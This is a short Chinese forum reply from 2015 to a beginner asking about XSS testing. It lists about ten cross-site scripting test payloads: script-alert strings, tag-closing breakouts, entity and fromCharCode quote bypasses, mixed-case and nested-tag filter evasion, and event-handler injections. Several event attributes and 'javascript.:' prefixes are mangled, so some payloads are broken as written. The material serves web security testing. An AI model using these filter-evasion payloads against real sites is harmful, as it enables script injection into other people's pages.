XSS攻击测试的新手求助
TAG:
- 引用 删除 make12345 / 2015-05-18 16:31:08
-
Xss代码可以有很多变形,可以是下面列子的变形组合。
1、 最简单最常用的测试代码:
<script>alert(“xss”)</script> 输入框或者url参数。
2、 闭合前面的标签:<input type=”text” value=””>
“><script>alert(“xss”)</script><a=”
3、 绕过引号过滤,过滤机制检测我们的输入一旦检测到单引号就加上\转义字符
使用html字符实体,如$#34;和"均表示双引号"><script>alert("xss")</script>
4、 使用javascript中的fromCharCode函数,用于将ascii转化成字符
<script>String.fromCharCode(97,108,101,114,116)(String.fromCharCode(88,83,83))</script>
5、 <ScRiPt. alert(“xss”);</ScRiPt>
6、 <Scriscriptpt>alert(“xss”);<scriScriptpt> 过滤时使用递归算法才能彻底过滤这种情况
不使用script标签
7、 我们可以使用<body nload=”alert(‘xss’)”>
8、 <img src=a nerror=”javascript.:alert(‘xss’)”>
9、 <input type=”text” name=”username” nclick=”javascript.:alert(‘xss’)”>
10、 onActivate与onfocus事件:
<input type=”text” name=”username” nActivate=”javascript.:alert(‘xss’)”>
<input type=”text” name=”username” nfocus=”javascript.:alert(‘xss’)”>
理论上所有的事件都可以用来绑定js命令,不再一一列举
http://www.w3school.com.cn/htmldom/dom_obj_event.asp
<img>标签